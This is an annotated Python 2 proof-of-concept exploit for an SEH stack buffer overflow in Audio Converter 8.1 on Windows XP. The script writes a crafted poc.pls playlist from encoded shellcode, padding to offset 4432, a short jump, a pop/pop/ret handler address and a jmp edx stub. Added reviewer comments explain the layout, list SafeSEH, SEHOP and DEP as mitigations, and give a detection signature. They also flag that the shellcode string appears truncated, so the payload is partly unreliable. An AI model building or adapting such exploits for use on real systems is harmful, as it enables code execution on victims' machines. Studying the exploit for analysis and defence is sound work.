#***********************************************************************************
# Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit
# Date : 16/05/2010
# Author : Sud0
# Bug found by : chap0
# Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html
# Version : 8.1
# OS : Windows
# Tested on : XP SP3 En (VirtualBox)
# Type of vuln : SEH
# Thanks to my wife for her support
# Thanks for chap0 for bringing us the game
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#
# Reviewer summary, for analysts reading this PoC:
#   Python 2 script (print statements, no parentheses). Its only effect is to
#   write one local file, poc.pls, with a fixed byte layout:
#     [encoded stub][ 'B' padding up to offset 4432 ][4-byte next-SEH]
#     [4-byte SEH handler][20 x 0x90][5-byte align stub][10000 x 'A']
#   Total size is 4432 + 4 + 4 + 20 + 5 + 10000 = 14465 bytes. Nothing is sent
#   over the network; the 'import socket' below is unused.
#   The offset (4432) and the handler address are measured against the build
#   named in the header (8.1 on XP SP3) and should not be assumed to hold on
#   any other version.
#   Mitigation: this is the classic SEH-overwrite chain (forged handler ->
#   pop/pop/ret -> short jump -> code on the stack). SafeSEH and SEHOP reject a
#   handler that is not registered / a broken chain, and DEP faults on executing
#   the stack buffer, so a build with those protections enabled is not affected
#   by this particular technique.
#   Detection: a .pls "playlist" of ~14 KB made almost entirely of repeated
#   'A'/'B' bytes is not a valid playlist and is a trivial content signature.
#
#code :
# Console banner (ASCII art flattened by the page capture); purely cosmetic.
print "|------------------------------------------------------------------|\n";
print "| __ __ |\n";
print "| _________ ________ / /___ _____ / /____ ____ _____ ___ |\n";
print "| / ___/ __ \\/ ___/ _ \\/ / __ `/ __ \\ / __/ _ \\/ __ `/ __ `__ \\ |\n";
print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |\n";
print "| \\___/\\____/_/ \\___/_/\\__,_/_/ /_/ \\__/\\___/\\__,_/_/ /_/ /_/ |\n";
print "| |\n";
print "| http://www.corelan.be:8800 |\n";
print "| |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] Exploit for .... \n";

import socket  # unused: this script never opens a socket, it only writes a file

#shellcode running calc.exe alpha2 encoded basereg edx
# Per the author's note this is an alphanumeric (alpha2) encoded stub whose
# decoder uses EDX as its base register, which is why the align stub further
# down ends in 'jmp edx'.
# NOTE(review): this string is much shorter than a typical alpha2-encoded
# calc.exe payload; it may have been truncated when the page was captured.
# Confirm against the original advisory before treating it as complete.
shell="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA"

# Pad with 'B' so that stub + padding is exactly 4432 bytes: the author's
# measured distance from the start of the buffer to the SEH record.
junk="B" * (4432 - len(shell)) #seh overwritten after 4432 bytes

# Next-SEH pointer slot: a 2-byte short 'jmp +6' (EB 06), repeated to fill the
# 4-byte slot, so execution skips over the handler address that follows.
nseh= "\xEB\x06\xEB\x06" # jmp forward

# SEH handler slot: little-endian 0x10038EF1, the pop/pop/ret ("ppr") gadget the
# author took from the application's own module. Presumably that module was
# built without SafeSEH, otherwise it would be rejected as a handler -- TODO confirm.
seh= "\xF1\x8E\x03\x10" # nice ppr from audioconv

# 0x61 = popad (three times), FF E2 = jmp edx. Presumably the popads leave EDX
# pointing at the start of the encoded stub so its decoder can run -- confirm
# in a debugger; the script itself does not establish this.
align="\x61\x61\x61\xff\xE2" # popad / popad / popad / jmp edx

# Final layout; 'buffer' shadows the Python 2 builtin of the same name (style
# nit, harmless here). The 20 NOPs sit between the handler and the align stub.
buffer= shell + junk + nseh + seh + "\x90" * 20 + align + "A"* 10000# added some nops after seh

# Text mode ('w') is harmless for this particular buffer because it contains no
# 0x0A byte that Windows would rewrite, but 'wb' is the correct mode for binary
# output. Three statements on one line is the author's style.
mefile = open('poc.pls','w'); mefile.write(buffer); mefile.close()